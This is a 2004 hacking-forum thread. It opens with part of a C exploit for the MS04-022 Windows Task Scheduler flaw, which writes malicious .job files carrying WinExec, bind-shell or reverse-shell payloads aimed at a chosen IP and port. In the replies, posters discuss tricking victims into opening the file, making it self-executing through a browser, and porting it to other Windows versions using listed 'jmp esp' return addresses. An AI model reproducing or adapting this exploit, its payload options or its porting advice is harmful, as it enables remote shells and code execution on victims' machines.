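 printf( "--------------------------\n" );
 printf( "%-9i  %s\n", PAYLOAD_ID_WINEXEC, "WinExec" );
 printf( "%-9i  %s\n", PAYLOAD_ID_BIND,  "BindShell" );
 printf( "%-9i  %s\n", PAYLOAD_ID_REVERSE, "ReverseShell" );
}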

/*
 * Entry point.
 *
 * argv[1] <TargetID>       index into Targets[] (see usage())
 * argv[2] <PayloadID>      PAYLOAD_ID_WINEXEC, PAYLOAD_ID_BIND or PAYLOAD_ID_REVERSE
 * argv[3] <OutputJobFile>  path the .job file is written to
 * argv[4..]                <Command>, <BindPort>, or <IP> <Port>, depending on the payload
 *
 * Always returns 0, also when creation fails: success or failure is reported
 * on stdout only, so callers cannot rely on the exit status.
 */
int main( int argc, char **argv )
{
int nTargetID;
int nPayloadID;
char *pszJobFile;
unsigned int nWinExecSize;
unsigned char *pWinExec;
unsigned short nPort;
unsigned long nIP;
bool bCreated;

// banner
printf( "+----------------------------------+\n" );
printf( "| MS04-022 Task Scheduler Exploits |\n" );
printf( "|           by ScriptGod           |\n" );
printf( "+----------------------------------+\n" );
printf( "|       version of 31.07.04        |\n" );
printf( "+----------------------------------+\n" );

// get parameter
if( argc < 5 )
{
 usage( argv[ 0 ] );
 return 0;
}
// atoi() returns 0 for non-numeric input and reports no error
nTargetID = atoi( argv[ 1 ] );
nPayloadID = atoi( argv[ 2 ] );
pszJobFile = argv[ 3 ];
// Range check. nTargetID is int and the sizeof quotient is size_t, so a
// negative nTargetID converts to a large unsigned value and is rejected here.
// A negative nPayloadID passes the ">= 3" test but matches none of the
// branches below, so bCreated stays false and the failure message is printed.
if( nTargetID >= sizeof( Targets ) / sizeof( Target ) || nPayloadID >= 3 ||
 ( nPayloadID == PAYLOAD_ID_REVERSE && argc < 6 ) )
{
 usage( argv[ 0 ] );
 return 0;
}

// user info
printf( "[+] creating for Target '%s' with ", Targets[ nTargetID ].pszName );

// create
bCreated = false;
if( nPayloadID == PAYLOAD_ID_WINEXEC )
{
 printf( "WinExec payload\n" );
 printf( "[+] command: %s\n", argv[ 4 ] );

 // build payload: shellcode bytes followed by the command as a NUL-terminated string
 nWinExecSize = ( sizeof( Paylaod_WinExec ) - 1 ) + ( strlen( argv[ 4 ] ) + 1 );
 pWinExec  = (unsigned char*)malloc( nWinExecSize );
 if( !pWinExec )
 {
  printf( "[-] out of memory\n" );
  return 0;
 }
 memset( pWinExec, 0x00, nWinExecSize );
 memcpy( pWinExec, Paylaod_WinExec, sizeof( Paylaod_WinExec ) - 1 );
 // strcpy is bounded by the allocation above (strlen( argv[ 4 ] ) + 1 bytes remain)
 strcpy( (char*)&pWinExec[ sizeof( Paylaod_WinExec ) - 1 ], argv[ 4 ] );

 // NOTE(review): pWinExec is never freed; harmless only because main() returns right after
 bCreated = CreateJobFilePayload( pszJobFile, pWinExec, nWinExecSize, Targets[ nTargetID ].nNewEIP );
}
else if( nPayloadID == PAYLOAD_ID_BIND )
{
 printf( "BindShell payload\n" );

 // info (atoi result truncated to 16 bits; out-of-range values are not rejected)
 nPort = (unsigned short)atoi( argv[ 4 ] );
 printf( "[+] port: %i\n", nPort  );

 // change byte order (network order, htons from the socket headers included above)
 nPort = htons( nPort );

 // set: type-punned 16-bit store into the global shellcode array
 *(unsigned short*)&Payload_BindShell[ BINDSHELL_PORT_OFFSET ] = nPort;

 // create
 bCreated = CreateJobFilePayload( pszJobFile, Payload_BindShell, sizeof( Payload_BindShell ) - 1, Targets[ nTargetID ].nNewEIP );
}
else if( nPayloadID == PAYLOAD_ID_REVERSE )
{
 printf( "ReverseShell payload\n" );

 // info
 // NOTE(review): inet_addr() returns INADDR_NONE for an unparsable address;
 // the result is not checked, so such a value is embedded as-is.
 nIP  = inet_addr( argv[ 4 ] );
 nPort = (unsigned short)atoi( argv[ 5 ] );
 printf( "[+] connect to: %s:%i\n", argv[ 4 ], nPort  );

 // change byte order
 nPort = htons( nPort );

 // set: type-punned stores into the global shellcode array; the 4-byte
 // address store assumes a 32-bit unsigned long
 *(unsigned long*)&Payload_ReverseShell[ REVERSESHELL_IP_OFFSET ] = nIP;
 *(unsigned short*)&Payload_ReverseShell[ REVERSESHELL_PORT_OFFSET ] = nPort;

 // create
 bCreated = CreateJobFilePayload( pszJobFile, Payload_ReverseShell, sizeof( Payload_ReverseShell ) - 1, Targets[ nTargetID ].nNewEIP );
}

// user info
if( bCreated )
 printf( "[+] job file '%s' created\n", pszJobFile );
else
 printf( "[-] job file creation failed\n" );

return 0;
}
tibbar
i thought id prevent the lame requests coming in - updated version attached.

enjoy.
mortello
QUOTE (tibbar @ Aug 1 2004, 11:05 PM)
i thought id prevent the lame requests coming in - updated version attached.

enjoy.

LoL, good thinking....will pass on it tho tongue.gif
net_runner
isnt dangerous people unable to compile running xploits?
mortello
QUOTE (net_runner @ Aug 2 2004, 09:01 AM)
isnt dangerous people unable to compile running xploits?

yes, but they would ask for it anyway, so in that case it prevents unnecessary posts and that way we keep up to the code
=k3Rn=
can you use this remotly?
i couldn't find any explanation on chonker.com

http://www.cnhonker.com/index.php?module=e...w&type=9&id=600
flashb4ck
hm i tried to change the code for a usage with mozilla so that it'll be a self executable cause mozilla / ie connect silent to the internet

sry for my weak english ...


gr€€tz fL4Shb4Ck
what
Okay, hopefully this won't be a dumb question, but I'm going to ask it anyways.

I was looking through your code, and I noticed that it only exploited Windows XP SP0+1 GER and no others, but you could DoS them all. So I was wondering, to change the "jmp esp" to another windows version, would you use kernel32.dll or the ACTIVEDS.dll found in the code. I'll try both, but I was just wondering.

P.S.

Did some research on metasploit:

In ACTIVEDS.dll, we had all of these options

jmp esp 0x76e61a21
jmp esp 0x76e61cd2
jmp esp 0x76e61cd6
jmp esp 0x76e61cda
jmp esp 0x76e61cde
jmp esp 0x76e61ce2
jmp esp 0x76e61ce6
jmp esp 0x76e61cea
jmp esp 0x76e61cee
jmp esp 0x76e61cf2
jmp esp 0x76e61cf6
jmp esp 0x76e61cfa
jmp esp 0x76e62e4f

and in kernel32.dll, we have nothing, and in ntdll.dll we have

0x77fb4dcc

Sorry about the question again, this year I'm taking AP computer science, which should clear everything up.
mortello
QUOTE (=k3Rn= @ Aug 3 2004, 04:39 AM)
can you use this remotly?
i couldn't find any explanation on chonker.com

http://www.cnhonker.com/index.php?module=e...w&type=9&id=600

didn't I write this to you already ? and isn't it earlier in this thread also ?

anyway, it's a LOCAL vulnerability; it cannot be scanned for!

However, if you manage to send it to someone and that he executes the .job file (I guess he only needs to go to that directory where it is from what I understand)...
mortello
QUOTE (what @ Aug 4 2004, 03:45 PM)
Okay, hopefully this won't be a dumb question, but I'm going to ask it anyways.

I was looking through your code, and I noticed that it only exploited Windows XP SP0+1 GER and no others, but you could DoS them all. So I was wondering, to change the "jmp esp" to another windows version, would you use kernel32.dll or the ACTIVEDS.dll found in the code. I'll try both, but I was just wondering.

P.S.

Did some research on metasploit:

In ACTIVEDS.dll, we had all of these options

jmp esp 0x76e61a21
jmp esp 0x76e61cd2
jmp esp 0x76e61cd6
jmp esp 0x76e61cda
jmp esp 0x76e61cde
jmp esp 0x76e61ce2
jmp esp 0x76e61ce6
jmp esp 0x76e61cea
jmp esp 0x76e61cee
jmp esp 0x76e61cf2
jmp esp 0x76e61cf6
jmp esp 0x76e61cfa
jmp esp 0x76e62e4f

and in kernel32.dll, we have nothing, and in ntdll.dll we have

0x77fb4dcc

Sorry about the question again, this year I'm taking AP computer science, which should clear everything up.

Not so stupid in fact....

I believe its the ACTIVEDS.dll and not the kernel32.dll one that you need to use since the kernel32.dll one is needed to run the code, and that's about it (for this vulnerability at least)

So you should have more luck using the values you found if you can make them correspond to another Win version
what
Ok, I've been reading up a little on buffer/stack overflows, and I have another question.

So, we find an overflow in a program, and overflow it with x's. This causes a segmentation fault by overflowing the return address with x's and making it point to 0x787878 to execute code, which is hex for x. Since 0x787878 does not have any instructions, it causes the segmentation fault. Say our return address is 0x80484d0, and our code that we want to execute is at 0x80484cb. This is the part where I start to get lost.

I got all of this information from http://www.securiteam.com/securityreviews/5OP0B006UQ.html if you want to help me out. They use a program to try to explain it, but to tell you the truth I'm not quite sure what the program is doing. Any help would be great.
ScriptGod
QUOTE (what @ Aug 4 2004, 03:45 PM)
Okay, hopefully this won't be a dumb question, but I'm going to ask it anyways.

I was looking through your code, and I noticed that it only exploited Windows XP SP0+1 GER and no others, but you could DoS them all. So I was wondering, to change the "jmp esp" to another windows version, would you use kernel32.dll or the ACTIVEDS.dll found in the code. I'll try both, but I was just wondering.

P.S.

Did some research on metasploit:

In ACTIVEDS.dll, we had all of these options

jmp esp 0x76e61a21
jmp esp 0x76e61cd2
jmp esp 0x76e61cd6
jmp esp 0x76e61cda
jmp esp 0x76e61cde
jmp esp 0x76e61ce2
jmp esp 0x76e61ce6
jmp esp 0x76e61cea
jmp esp 0x76e61cee
jmp esp 0x76e61cf2
jmp esp 0x76e61cf6
jmp esp 0x76e61cfa
jmp esp 0x76e62e4f

and in kernel32.dll, we have nothing, and in ntdll.dll we have

0x77fb4dcc

Sorry about the question again, this year I'm taking AP computer science, which should clear everything up.

- kernel32.dll changes through the service packs, so offsets are not universal...
- ACTIVEDS.dll, is not loaded in IExplorer.exe
- mstask.dll is loaded by both, and the bug is located in it, so there are not many version conflicts in the offset...

however I realized when writing some other exploits that the offsets for the EU versions are almost the same, except for the English versions, because there most DLLs are loaded at a different base.
ScriptGod
QUOTE (what @ Aug 4 2004, 04:38 PM)
Ok, I've been reading up a little on buffer/stack overflows, and I have another question.

So, we find an overflow in a program, and overflow it with x's. This causes a segmentation fault by overflowing the return address with x's and making it point to 0x787878 to execute code, which is hex for x. Since 0x787878 does not have any instructions, it causes the segmentation fault. Say our return address is 0x80484d0, and our code that we want to execute is at 0x80484cb. This is the part where I start to get lost.

I got all of this information from http://www.securiteam.com/securityreviews/5OP0B006UQ.html if you want to help me out. They use a program to try to explain it, but to tell you the truth I'm not quite sure what the program is doing. Any help would be great.

Yes this is correct.
{ "DoS Windows XP ALL", 0xffffffff },
This will set the return address to 0xffffffff. This is never valid, so this will crash the application. However, under Windows this will cause no segmentation fault - it will cause an access fault, because this address is reserved for the kernel and can't be accessed in user mode.